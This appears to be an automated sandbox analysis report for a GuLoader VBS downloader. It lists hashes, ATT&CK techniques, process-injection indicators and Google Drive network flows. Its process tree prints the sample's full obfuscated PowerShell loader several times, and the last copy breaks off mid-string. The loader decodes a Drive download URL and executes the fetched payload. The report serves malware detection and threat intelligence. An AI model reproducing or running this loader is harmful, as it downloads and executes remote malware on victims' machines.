guloader | 138e14ab6f482511b4965e42d0a9bd1d4bf7e97395a658b5a050a2fbd7801616

General

Target

138e14ab6f482511b4965e42d0a9bd1d4bf7e97395a658b5a050a2fbd7801616.vbs
Size

31KB
MD5

7a2764240a88f6ed3b5d20a27c7aed4b
SHA1

82ccd89a01ddb8473af610427b8e74cc578215e1
SHA256

138e14ab6f482511b4965e42d0a9bd1d4bf7e97395a658b5a050a2fbd7801616
SHA512

3dde505fa49a7adab7ee3868d563a78616f87b178b999edcdb456c2a10a1c790d84a775959262e85b550b989cfa13eeb10c4dd425a6288b6354fb003d0d695f6
SSDEEP

768:Zp3UoMmVOExusrjfn9O/IcH3M2BPeSgRSqQgnZSa8RKZ6PRAxMikzYAs3:ZdU8O/DNmb

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2160	powershell.exe
7	2160	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2160	powershell.exe
2596	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2596	powershell.exe
2604	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2596 set thread context of 2604	2596	powershell.exe	38

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2596	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2160	powershell.exe
2596	powershell.exe
2596	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2160	2336	WScript.exe	31
PID 2336 wrote to memory of 2160	2336	WScript.exe	31
PID 2336 wrote to memory of 2160	2336	WScript.exe	31
PID 2160 wrote to memory of 1492	2160	powershell.exe	33
PID 2160 wrote to memory of 1492	2160	powershell.exe	33
PID 2160 wrote to memory of 1492	2160	powershell.exe	33
PID 2160 wrote to memory of 2832	2160	powershell.exe	35
PID 2160 wrote to memory of 2832	2160	powershell.exe	35
PID 2160 wrote to memory of 2832	2160	powershell.exe	35
PID 2832 wrote to memory of 2596	2832	cmd.exe	36
PID 2832 wrote to memory of 2596	2832	cmd.exe	36
PID 2832 wrote to memory of 2596	2832	cmd.exe	36
PID 2832 wrote to memory of 2596	2832	cmd.exe	36
PID 2596 wrote to memory of 2724	2596	powershell.exe	37
PID 2596 wrote to memory of 2724	2596	powershell.exe	37
PID 2596 wrote to memory of 2724	2596	powershell.exe	37
PID 2596 wrote to memory of 2724	2596	powershell.exe	37
PID 2596 wrote to memory of 2604	2596	powershell.exe	38
PID 2596 wrote to memory of 2604	2596	powershell.exe	38
PID 2596 wrote to memory of 2604	2596	powershell.exe	38
PID 2596 wrote to memory of 2604	2596	powershell.exe	38
PID 2596 wrote to memory of 2604	2596	powershell.exe	38
PID 2596 wrote to memory of 2604	2596	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\138e14ab6f482511b4965e42d0a9bd1d4bf7e97395a658b5a050a2fbd7801616.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Antipodeans Distribueres Owlhead #>;$Kinesthaesis='Amfibietank';<#Greenstone Beatifically Preabundant Anvendelsesmssige Sozine #>;$Meroceritic=$host.PrivateData;If ($Meroceritic) {$paining++;}function Ankomstperronens($Opskrekniv){$Cirkulationspumpes=$Opskrekniv.Length-$paining;for( $Vidtrkkendes=5;$Vidtrkkendes -lt $Cirkulationspumpes;$Vidtrkkendes+=6){$Bilagt+=$Opskrekniv[$Vidtrkkendes];}$Bilagt;}function Sproglyd($Altsammen214){ & ($Afdansningsbal) ($Altsammen214);}$Cuminol=Ankomstperronens 'kinooM orsdoSynchz ighbihvinelCrocolna neaIs ch/ H.ve5Trina. Une,0Stege Abou( repeWSka di suk,nSubm dKlineoC growDe,ils nond LimbeNElectTRealt B sh1Dis n0Unrev. Unle0Cilif;Cholo PalaeW GlaziCa irnstrid6P ads4 rlso; Quad Par nxSpann6 Udaa4Skean; arme SelvfrAktuav Anic: temp1Norms2Nikla1Vindp.Pasto0 Anti) fsla An.ipG sudaeMellecFamilk UnexoGl,ba/Synov2baby.0S lde1Apple0Perva0sa ds1Ef.er0sters1Tuata Kran FL,ppeiTr chrSkriveHar ofSodetob.amixValed/Nonen1 Fork2Uneph1Sicar.B daw0indhf ';$Dramatic=Ankomstperronens 'PersouRumstsSy sbeMicror lmen-UnlumaMedalgPositeFugi N UnpoT edes ';$Adjunkturs=Ankomstperronens 'PandahSlad,tStasit.andepDirecs Skur:Spoo /w nch/devaldDato,rKnkkeiByerhvHu,preBinna.Niveag OvntoHarmooTopong VandlForsleOkkup.Pre nc FljtoExtenmNord./P.ogou .ilhc Besv? N agePessaxC nonpSplino RachrStumptSe eb=IndkrdSigtboEn,rgw Oplsn DatelUnconoStngea BessdSid b& CytoiAnettdVipet=Brnef1 ZoongDisopu Woad7UnspePHeddlWHatm.qTrstay UnbooNoncoZ abec Came7Ja,boW reg P L ftJ,amkrV ehagUParamtBebud4I.olaYWandfnMisjoXN kvrj Isol-Lun.ex BullsPea oP T tr7TaoisoHavbiQDelti0 D mm9Seku,J Supe ';$Unsteadfast=Ankomstperronens 'Widde>Bletp ';$Afdansningsbal=Ankomstperronens 'GrafeIDysene ReflxCenta ';$Mouches246='Overassertiveness';$Misanthropes = Ankomstperronens ' Lnsoe ErlgcGrouchJonisoSexfi Eneba%MarquaAfledp Ordrp FourdVilliaSt.ret VarbaOut.a%Perio\ Granb Undee,dpegkHypereprogrnFngsedsommetSu tagMyrt rDil te BirdlSpirisLivsteCindenBl,ck.WaxieFEkserlHonoraDiege Crowd&Sobpr& Besi archpeCrimic omnahSkotvo Cara Arti t Tilr ';Sproglyd (Ankomstperronens 'h seh$ invegJulenlAcculo lgebgnaskaMonodlKuler:whiteBBigemaSocias Tok,iFu.iocOutpoiNonpat bgerybro,d=baalp(PhrencRebramTo aldEnran capt/Prebacfgte Levn$JordbMSamariEsca.sOilfiaOverpnLedertUd mnh PanarPreacoLillepkatarePermusSemip)Insis ');Sproglyd (Ankomstperronens 'Sili $.ndocg Tonnl HoveoViderbCompuaSgefulHalva:RafteIDryppn.ulkltStimaeUnderrlong nHet.ra pndhl UnpriDi.trzPre saBuklit Grabi ommeoK.esbnWhim s eder= Sd r$StellADra edNutidj tacku Cowrn SulpkUdryktS,eveuForeprFiretsIndga. ejlsMudslp ulpl CockiUdlant Prot(termi$FiskeUForskn Ger sPre pt hileT staa AnsvdGe onfPaakeaindeks Skrmt.orlb) stvs ');Sproglyd (Ankomstperronens 'P oso[BleciNMusice Tunet Bekn.PerroSJazype ,prorS btovDgnfliCan tcSlu neDatakPcrow o DualiBrdrrnBiblit Akk,M PeataSmertn O faaStipegKombie AfvrrSarco]Lokk : S lg: TriaS verwe HemacT.tteuPhlebrJaevnibiblitFlamayHaltePAn omr EpigoPrepot DiskoNervecAnligononrulBaske M,nue=Viden Lathe[ F.brNdec neUd,lgt Bde .,rbejSSahoue DehucSjl hu GammrY elsivalsetT kamyFro.tPF aadrCarbooDizzitTaageoCleisc PlumoAdvarlTrugoTkbeneyEducap.urnaeFrikt] Klas:Vital:M ssrT Whe,lRuts selske1Kj rs2sign ');$Adjunkturs=$Internalizations[0];$Raadige= (Ankomstperronens 'April$Danneg ibelL hysioEarneBFot,ka samolPostc:SammeGb gniaSpin L.ikarlRedboaPhyloMsultaIIllnedAfdradKaleja Wa,fgG,niaEUdskanTobak6Smaar=OrthonKvsteeHin eW p ck-BilloO.ordlBkampeJRin fE.ustecinterTcacox HenfaS PostYPectisU,komT EproEEquivMDiape.Char.nKontreRoadcTHa,de.GlucuWStueoe oeliBT,ondcRaastl AspaichurceM gesN,inwht');$Raadige+=$Basicity[1];Sproglyd ($Raadige);Sproglyd (Ankomstperronens 'Belie$SituaGEtnogaNedstlKarafl.rifoaKon imSp.jliRiflidHuddldKol oaSk.ldg CycleHetern .nfo6Samme.UddanH EffoeGlasuaOversdaflyte S,ykr nagls ulle[sacra$WulllDOpsp r aaheaProg,mSmrska UidetK uckiGregacKnsho]Sturt=Hoodl$ StodCBadenuAtenimUgestiTy.isnIrri oMaalsl ungu ');$Unrepressible=Ankomstperronens 'Inter$ GodkGSentiaB okklOr,hellarveaD,agem.eovii PlacdflyindEvakuaCoendgEndote SomdnSa dl6A sen. GhazDFogdeoAssorwker enCut,ilSvmmeoThun,aB findTo knF p aniLoverl Supee Ordf(Cerbe$TravlASpirodPatruj HemauBomb,nRednikSequetmelpeuSyn,nr Monos Be.e,Repro$Buni,OCont cPhylauHlqnpl PaneoPlatopWeighaOphavlPaterpSolodeBa.drbFiskerEpigra,unovlNatur)Oundy ';$Oculopalpebral=$Basicity[0];Sproglyd (Ankomstperronens 'Trskr$ UndeggunreLAdelsOStempBarbeja BygnlHyalo:IdiopEGanglxJo dsT AntaRsuaviaVari M AffiAS.mfuTHig.hRStadtIGkkebCCloveA PerfL Nonr=Bo us(NummeTK,arueRendeSotolat.enag-Pa,onpKlapsA D.ueT edichDis,n preco$GerrioCopa cKrimiuB ndelS oocoFol ePAagesAStraaLInflaPFaku.ERdgarBMesenrSpiroaSt lklSt ve) Leve ');while (!$Extramatrical) {Sproglyd (Ankomstperronens 'Netvr$MaxiegA.armlRatifoKrishbS,abea vmmlr mou:TewarLLodgiaTudsknTonetgGambitWas.euSkyklrRytteeBybos=u.com$SterstOmdelrAa skuBivoueSchaa ') ;Sproglyd $Unrepressible;Sproglyd (Ankomstperronens 'CyanoSOrthotAfs naDronnrFejlstCapia-DissiSAuskulmarg e oopse Cou,pComun o err4Panic ');Sproglyd (Ankomstperronens 'Bijob$ Refug SamolVarmeoDigekbFarmhaTex il Over:MahonE dsonxHumletmi,cor.risfaPraepmCogitaEnkeltKaerlrHv deiSolarcfreemaCobi l ede=E ito(BrudfTb.streSlbt,s unsetSpise-TroopPPetroa So stCo,coh W.ww Peltm$Over OFuppec.rskruS,illlV janoJ tunpparlaaGuberl Overp E cueSo esbS,attrGaintaD,sellCallo)Remtr ') ;Sproglyd (Ankomstperronens ' Orat$trickgFactolStr koGrav,bGamboa Ko il Pris:SengeT rundeMil bl neope T,knfcanteoEoghanAver iTrfods TotetSviensUnimp=Integ$ s mmgWm.uvlOs iao UninbAm hiaRadiolNapp :NonsmBci alePoonggAtrosrPro re gelibIkonasNedlgaDeserpUre hp Bon.aEg cerForeta kulmtagerke SpektU,fle+h ndy+Takke%Pi ke$PapyrIBaronnStjgetMarkeeDiaxorD iftn LimpaUncerlKoldtiAsterzG.ardaMegantbr,chiViolooTimotnFunktsShirt.baromc BleaoL zuluFructn,aucetFlaun ') ;$Adjunkturs=$Internalizations[$Telefonists];}$Finesserne=330114;$Rhodinol=27825;Sproglyd (Ankomstperronens 'uhygg$ BerkgSnedil dekaoKonnybTrashanaksklAutoi: .nhrIFr sonRediscChefsrCarpeeEuka a ealls kifeeKon,er syndsOe tr Melin=Koope Udfo G EpipeSwamptLemmy- AnkeCSmorgo nhalnG.ievtDenunePiac.n.rykkt Supr Under$K,lerOCitroc PateuKaardlUnsunobes jp GrnsaCrostlAest pUreomeSplenb,crolrLiniea xultlKu si ');Sproglyd (Ankomstperronens 'inter$ Milig NowalFossio ArgibShutta Laccl Pe m: Sh cSS.robkAnsg,i lopelUnl gd Tax,r Lyv.eBllebr GenseSquidsS,ild Aphel= Si k Slagt[ZaribSLinchy Bil.sUnmortCitroeVentrmMell .PrivaCIxorao mbednFravnvPassie SynorBedaat.ydro]Bynke:Utrtt:Bel,gF EdderTaffioRefunmO errBKostfa.ingbs,rmbeecla.s6Spi t4FrissSEnfout Sv,nrdothiiUnor nkrystg uda(Outbr$Me roIGlosan kibcDihydr DynaeLeg,faSenils MetaeAarsorPaafys Hens)Stirr ');Sproglyd (Ankomstperronens 'Ve,ke$UnattgOverclFunktoSlutvbSuperaBankllCanto: rdlBDigtsrho oieTelfosHyreveSquasl.ampkeIn errtoa g aga=F.act P ig[AstraSArecaySnapssSvovltHalvreUnisomOstr..FructTNewneeadvarxFor lt Ba c.Ins.aEMacronEf.ercFi keo DonkdColi iV.ndendookegDurma]Tider:Supas:T rnbA OtopSRammiCAal oI CascIugela.QuakeGFunkteWoolstStatsSUdlgstBandcrP,romiNim tnDebatgU.spi(,icni$ StafSnondekPrecoiSynchlGudsfdTelekr An eePraktr Af keKomplsFo en) Ade ');Sproglyd (Ankomstperronens ' tith$ K gegRadmalFrigeoCamoub,emesaBremsl K.iv:HeretNKoo doOblonnKultulKap ta SlutcOphjetBetraeTalesaRelaulVivacl.ngrayPlano=Roit $telemBKlvnirNe.stesaddusImagieTotallFolk,eNar arDepar.LesbisNaturuTagerbrateasUndertBehanrM sseiAkkumnBlettgdesin( B ll$ NedkFStageirejsenrepree ttens Colls.ippeeSnapsrSpewinFjordePlans, Info$SmrinRLa.hbh Uudso chiadDisesiOctaenDed,loRek yl Hafg)Regno ');Sproglyd $Nonlacteally;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\bekendtgrelsen.Fla && echo t"
    3⤵
    PID:1492
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Antipodeans Distribueres Owlhead #>;$Kinesthaesis='Amfibietank';<#Greenstone Beatifically Preabundant Anvendelsesmssige Sozine #>;$Meroceritic=$host.PrivateData;If ($Meroceritic) {$paining++;}function Ankomstperronens($Opskrekniv){$Cirkulationspumpes=$Opskrekniv.Length-$paining;for( $Vidtrkkendes=5;$Vidtrkkendes -lt $Cirkulationspumpes;$Vidtrkkendes+=6){$Bilagt+=$Opskrekniv[$Vidtrkkendes];}$Bilagt;}function Sproglyd($Altsammen214){ & ($Afdansningsbal) ($Altsammen214);}$Cuminol=Ankomstperronens 'kinooM orsdoSynchz ighbihvinelCrocolna neaIs ch/ H.ve5Trina. Une,0Stege Abou( repeWSka di suk,nSubm dKlineoC growDe,ils nond LimbeNElectTRealt B sh1Dis n0Unrev. Unle0Cilif;Cholo PalaeW GlaziCa irnstrid6P ads4 rlso; Quad Par nxSpann6 Udaa4Skean; arme SelvfrAktuav Anic: temp1Norms2Nikla1Vindp.Pasto0 Anti) fsla An.ipG sudaeMellecFamilk UnexoGl,ba/Synov2baby.0S lde1Apple0Perva0sa ds1Ef.er0sters1Tuata Kran FL,ppeiTr chrSkriveHar ofSodetob.amixValed/Nonen1 Fork2Uneph1Sicar.B daw0indhf ';$Dramatic=Ankomstperronens 'PersouRumstsSy sbeMicror lmen-UnlumaMedalgPositeFugi N UnpoT edes ';$Adjunkturs=Ankomstperronens 'PandahSlad,tStasit.andepDirecs Skur:Spoo /w nch/devaldDato,rKnkkeiByerhvHu,preBinna.Niveag OvntoHarmooTopong VandlForsleOkkup.Pre nc FljtoExtenmNord./P.ogou .ilhc Besv? N agePessaxC nonpSplino RachrStumptSe eb=IndkrdSigtboEn,rgw Oplsn DatelUnconoStngea BessdSid b& CytoiAnettdVipet=Brnef1 ZoongDisopu Woad7UnspePHeddlWHatm.qTrstay UnbooNoncoZ abec Came7Ja,boW reg P L ftJ,amkrV ehagUParamtBebud4I.olaYWandfnMisjoXN kvrj Isol-Lun.ex BullsPea oP T tr7TaoisoHavbiQDelti0 D mm9Seku,J Supe ';$Unsteadfast=Ankomstperronens 'Widde>Bletp ';$Afdansningsbal=Ankomstperronens 'GrafeIDysene ReflxCenta ';$Mouches246='Overassertiveness';$Misanthropes = Ankomstperronens ' Lnsoe ErlgcGrouchJonisoSexfi Eneba%MarquaAfledp Ordrp FourdVilliaSt.ret VarbaOut.a%Perio\ Granb Undee,dpegkHypereprogrnFngsedsommetSu tagMyrt rDil te BirdlSpirisLivsteCindenBl,ck.WaxieFEkserlHonoraDiege Crowd&Sobpr& Besi archpeCrimic omnahSkotvo Cara Arti t Tilr ';Sproglyd (Ankomstperronens 'h seh$ invegJulenlAcculo lgebgnaskaMonodlKuler:whiteBBigemaSocias Tok,iFu.iocOutpoiNonpat bgerybro,d=baalp(PhrencRebramTo aldEnran capt/Prebacfgte Levn$JordbMSamariEsca.sOilfiaOverpnLedertUd mnh PanarPreacoLillepkatarePermusSemip)Insis ');Sproglyd (Ankomstperronens 'Sili $.ndocg Tonnl HoveoViderbCompuaSgefulHalva:RafteIDryppn.ulkltStimaeUnderrlong nHet.ra pndhl UnpriDi.trzPre saBuklit Grabi ommeoK.esbnWhim s eder= Sd r$StellADra edNutidj tacku Cowrn SulpkUdryktS,eveuForeprFiretsIndga. ejlsMudslp ulpl CockiUdlant Prot(termi$FiskeUForskn Ger sPre pt hileT staa AnsvdGe onfPaakeaindeks Skrmt.orlb) stvs ');Sproglyd (Ankomstperronens 'P oso[BleciNMusice Tunet Bekn.PerroSJazype ,prorS btovDgnfliCan tcSlu neDatakPcrow o DualiBrdrrnBiblit Akk,M PeataSmertn O faaStipegKombie AfvrrSarco]Lokk : S lg: TriaS verwe HemacT.tteuPhlebrJaevnibiblitFlamayHaltePAn omr EpigoPrepot DiskoNervecAnligononrulBaske M,nue=Viden Lathe[ F.brNdec neUd,lgt Bde .,rbejSSahoue DehucSjl hu GammrY elsivalsetT kamyFro.tPF aadrCarbooDizzitTaageoCleisc PlumoAdvarlTrugoTkbeneyEducap.urnaeFrikt] Klas:Vital:M ssrT Whe,lRuts selske1Kj rs2sign ');$Adjunkturs=$Internalizations[0];$Raadige= (Ankomstperronens 'April$Danneg ibelL hysioEarneBFot,ka samolPostc:SammeGb gniaSpin L.ikarlRedboaPhyloMsultaIIllnedAfdradKaleja Wa,fgG,niaEUdskanTobak6Smaar=OrthonKvsteeHin eW p ck-BilloO.ordlBkampeJRin fE.ustecinterTcacox HenfaS PostYPectisU,komT EproEEquivMDiape.Char.nKontreRoadcTHa,de.GlucuWStueoe oeliBT,ondcRaastl AspaichurceM gesN,inwht');$Raadige+=$Basicity[1];Sproglyd ($Raadige);Sproglyd (Ankomstperronens 'Belie$SituaGEtnogaNedstlKarafl.rifoaKon imSp.jliRiflidHuddldKol oaSk.ldg CycleHetern .nfo6Samme.UddanH EffoeGlasuaOversdaflyte S,ykr nagls ulle[sacra$WulllDOpsp r aaheaProg,mSmrska UidetK uckiGregacKnsho]Sturt=Hoodl$ StodCBadenuAtenimUgestiTy.isnIrri oMaalsl ungu ');$Unrepressible=Ankomstperronens 'Inter$ GodkGSentiaB okklOr,hellarveaD,agem.eovii PlacdflyindEvakuaCoendgEndote SomdnSa dl6A sen. GhazDFogdeoAssorwker enCut,ilSvmmeoThun,aB findTo knF p aniLoverl Supee Ordf(Cerbe$TravlASpirodPatruj HemauBomb,nRednikSequetmelpeuSyn,nr Monos Be.e,Repro$Buni,OCont cPhylauHlqnpl PaneoPlatopWeighaOphavlPaterpSolodeBa.drbFiskerEpigra,unovlNatur)Oundy ';$Oculopalpebral=$Basicity[0];Sproglyd (Ankomstperronens 'Trskr$ UndeggunreLAdelsOStempBarbeja BygnlHyalo:IdiopEGanglxJo dsT AntaRsuaviaVari M AffiAS.mfuTHig.hRStadtIGkkebCCloveA PerfL Nonr=Bo us(NummeTK,arueRendeSotolat.enag-Pa,onpKlapsA D.ueT edichDis,n preco$GerrioCopa cKrimiuB ndelS oocoFol ePAagesAStraaLInflaPFaku.ERdgarBMesenrSpiroaSt lklSt ve) Leve ');while (!$Extramatrical) {Sproglyd (Ankomstperronens 'Netvr$MaxiegA.armlRatifoKrishbS,abea vmmlr mou:TewarLLodgiaTudsknTonetgGambitWas.euSkyklrRytteeBybos=u.com$SterstOmdelrAa skuBivoueSchaa ') ;Sproglyd $Unrepressible;Sproglyd (Ankomstperronens 'CyanoSOrthotAfs naDronnrFejlstCapia-DissiSAuskulmarg e oopse Cou,pComun o err4Panic ');Sproglyd (Ankomstperronens 'Bijob$ Refug SamolVarmeoDigekbFarmhaTex il Over:MahonE dsonxHumletmi,cor.risfaPraepmCogitaEnkeltKaerlrHv deiSolarcfreemaCobi l ede=E ito(BrudfTb.streSlbt,s unsetSpise-TroopPPetroa So stCo,coh W.ww Peltm$Over OFuppec.rskruS,illlV janoJ tunpparlaaGuberl Overp E cueSo esbS,attrGaintaD,sellCallo)Remtr ') ;Sproglyd (Ankomstperronens ' Orat$trickgFactolStr koGrav,bGamboa Ko il Pris:SengeT rundeMil bl neope T,knfcanteoEoghanAver iTrfods TotetSviensUnimp=Integ$ s mmgWm.uvlOs iao UninbAm hiaRadiolNapp :NonsmBci alePoonggAtrosrPro re gelibIkonasNedlgaDeserpUre hp Bon.aEg cerForeta kulmtagerke SpektU,fle+h ndy+Takke%Pi ke$PapyrIBaronnStjgetMarkeeDiaxorD iftn LimpaUncerlKoldtiAsterzG.ardaMegantbr,chiViolooTimotnFunktsShirt.baromc BleaoL zuluFructn,aucetFlaun ') ;$Adjunkturs=$Internalizations[$Telefonists];}$Finesserne=330114;$Rhodinol=27825;Sproglyd (Ankomstperronens 'uhygg$ BerkgSnedil dekaoKonnybTrashanaksklAutoi: .nhrIFr sonRediscChefsrCarpeeEuka a ealls kifeeKon,er syndsOe tr Melin=Koope Udfo G EpipeSwamptLemmy- AnkeCSmorgo nhalnG.ievtDenunePiac.n.rykkt Supr Under$K,lerOCitroc PateuKaardlUnsunobes jp GrnsaCrostlAest pUreomeSplenb,crolrLiniea xultlKu si ');Sproglyd (Ankomstperronens 'inter$ Milig NowalFossio ArgibShutta Laccl Pe m: Sh cSS.robkAnsg,i lopelUnl gd Tax,r Lyv.eBllebr GenseSquidsS,ild Aphel= Si k Slagt[ZaribSLinchy Bil.sUnmortCitroeVentrmMell .PrivaCIxorao mbednFravnvPassie SynorBedaat.ydro]Bynke:Utrtt:Bel,gF EdderTaffioRefunmO errBKostfa.ingbs,rmbeecla.s6Spi t4FrissSEnfout Sv,nrdothiiUnor nkrystg uda(Outbr$Me roIGlosan kibcDihydr DynaeLeg,faSenils MetaeAarsorPaafys Hens)Stirr ');Sproglyd (Ankomstperronens 'Ve,ke$UnattgOverclFunktoSlutvbSuperaBankllCanto: rdlBDigtsrho oieTelfosHyreveSquasl.ampkeIn errtoa g aga=F.act P ig[AstraSArecaySnapssSvovltHalvreUnisomOstr..FructTNewneeadvarxFor lt Ba c.Ins.aEMacronEf.ercFi keo DonkdColi iV.ndendookegDurma]Tider:Supas:T rnbA OtopSRammiCAal oI CascIugela.QuakeGFunkteWoolstStatsSUdlgstBandcrP,romiNim tnDebatgU.spi(,icni$ StafSnondekPrecoiSynchlGudsfdTelekr An eePraktr Af keKomplsFo en) Ade ');Sproglyd (Ankomstperronens ' tith$ K gegRadmalFrigeoCamoub,emesaBremsl K.iv:HeretNKoo doOblonnKultulKap ta SlutcOphjetBetraeTalesaRelaulVivacl.ngrayPlano=Roit $telemBKlvnirNe.stesaddusImagieTotallFolk,eNar arDepar.LesbisNaturuTagerbrateasUndertBehanrM sseiAkkumnBlettgdesin( B ll$ NedkFStageirejsenrepree ttens Colls.ippeeSnapsrSpewinFjordePlans, Info$SmrinRLa.hbh Uudso chiadDisesiOctaenDed,loRek yl Hafg)Regno ');Sproglyd $Nonlacteally;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Antipodeans Distribueres Owlhead #>;$Kinesthaesis='Amfibietank';<#Greenstone Beatifically Preabundant Anvendelsesmssige Sozine #>;$Meroceritic=$host.PrivateData;If ($Meroceritic) {$paining++;}function Ankomstperronens($Opskrekniv){$Cirkulationspumpes=$Opskrekniv.Length-$paining;for( $Vidtrkkendes=5;$Vidtrkkendes -lt $Cirkulationspumpes;$Vidtrkkendes+=6){$Bilagt+=$Opskrekniv[$Vidtrkkendes];}$Bilagt;}function Sproglyd($Altsammen214){ & ($Afdansningsbal) ($Altsammen214);}$Cuminol=Ankomstperronens 'kinooM orsdoSynchz ighbihvinelCrocolna neaIs ch/ H.ve5Trina. Une,0Stege Abou( repeWSka di suk,nSubm dKlineoC growDe,ils nond LimbeNElectTRealt B sh1Dis n0Unrev. Unle0Cilif;Cholo PalaeW GlaziCa irnstrid6P ads4 rlso; Quad Par nxSpann6 Udaa4Skean; arme SelvfrAktuav Anic: temp1Norms2Nikla1Vindp.Pasto0 Anti) fsla An.ipG sudaeMellecFamilk UnexoGl,ba/Synov2baby.0S lde1Apple0Perva0sa ds1Ef.er0sters1Tuata Kran FL,ppeiTr chrSkriveHar ofSodetob.amixValed/Nonen1 Fork2Uneph1Sicar.B daw0indhf ';$Dramatic=Ankomstperronens 'PersouRumstsSy sbeMicror lmen-UnlumaMedalgPositeFugi N UnpoT edes ';$Adjunkturs=Ankomstperronens 'PandahSlad,tStasit.andepDirecs Skur:Spoo /w nch/devaldDato,rKnkkeiByerhvHu,preBinna.Niveag OvntoHarmooTopong VandlForsleOkkup.Pre nc FljtoExtenmNord./P.ogou .ilhc Besv? N agePessaxC nonpSplino RachrStumptSe eb=IndkrdSigtboEn,rgw Oplsn DatelUnconoStngea BessdSid b& CytoiAnettdVipet=Brnef1 ZoongDisopu Woad7UnspePHeddlWHatm.qTrstay UnbooNoncoZ abec Came7Ja,boW reg P L ftJ,amkrV ehagUParamtBebud4I.olaYWandfnMisjoXN kvrj Isol-Lun.ex BullsPea oP T tr7TaoisoHavbiQDelti0 D mm9Seku,J Supe ';$Unsteadfast=Ankomstperronens 'Widde>Bletp ';$Afdansningsbal=Ankomstperronens 'GrafeIDysene ReflxCenta ';$Mouches246='Overassertiveness';$Misanthropes = Ankomstperronens ' Lnsoe ErlgcGrouchJonisoSexfi Eneba%MarquaAfledp Ordrp FourdVilliaSt.ret VarbaOut.a%Perio\ Granb Undee,dpegkHypereprogrnFngsedsommetSu tagMyrt rDil te BirdlSpirisLivsteCindenBl,ck.WaxieFEkserlHonoraDiege Crowd&Sobpr& Besi archpeCrimic omnahSkotvo Cara Arti t Tilr ';Sproglyd (Ankomstperronens 'h seh$ invegJulenlAcculo lgebgnaskaMonodlKuler:whiteBBigemaSocias Tok,iFu.iocOutpoiNonpat bgerybro,d=baalp(PhrencRebramTo aldEnran capt/Prebacfgte Levn$JordbMSamariEsca.sOilfiaOverpnLedertUd mnh PanarPreacoLillepkatarePermusSemip)Insis ');Sproglyd (Ankomstperronens 'Sili $.ndocg Tonnl HoveoViderbCompuaSgefulHalva:RafteIDryppn.ulkltStimaeUnderrlong nHet.ra pndhl UnpriDi.trzPre saBuklit Grabi ommeoK.esbnWhim s eder= Sd r$StellADra edNutidj tacku Cowrn SulpkUdryktS,eveuForeprFiretsIndga. ejlsMudslp ulpl CockiUdlant Prot(termi$FiskeUForskn Ger sPre pt hileT staa AnsvdGe onfPaakeaindeks Skrmt.orlb) stvs ');Sproglyd (Ankomstperronens 'P oso[BleciNMusice Tunet Bekn.PerroSJazype ,prorS btovDgnfliCan tcSlu neDatakPcrow o DualiBrdrrnBiblit Akk,M PeataSmertn O faaStipegKombie AfvrrSarco]Lokk : S lg: TriaS verwe HemacT.tteuPhlebrJaevnibiblitFlamayHaltePAn omr EpigoPrepot DiskoNervecAnligononrulBaske M,nue=Viden Lathe[ F.brNdec neUd,lgt Bde .,rbejSSahoue DehucSjl hu GammrY elsivalsetT kamyFro.tPF aadrCarbooDizzitTaageoCleisc PlumoAdvarlTrugoTkbeneyEducap.urnaeFrikt] Klas:Vital:M ssrT Whe,lRuts selske1Kj rs2sign ');$Adjunkturs=$Internalizations[0];$Raadige= (Ankomstperronens 'April$Danneg ibelL hysioEarneBFot,ka samolPostc:SammeGb gniaSpin L.ikarlRedboaPhyloMsultaIIllnedAfdradKaleja Wa,fgG,niaEUdskanTobak6Smaar=OrthonKvsteeHin eW p ck-BilloO.ordlBkampeJRin fE.ustecinterTcacox HenfaS PostYPectisU,komT EproEEquivMDiape.Char.nKontreRoadcTHa,de.GlucuWStueoe oeliBT,ondcRaastl AspaichurceM gesN,inwht');$Raadige+=$Basicity[1];Sproglyd ($Raadige);Sproglyd (Ankomstperronens 'Belie$SituaGEtnogaNedstlKarafl.rifoaKon imSp.jliRiflidHuddldKol oaSk.ldg CycleHetern .nfo6Samme.UddanH EffoeGlasuaOversdaflyte S,ykr nagls ulle[sacra$WulllDOpsp r 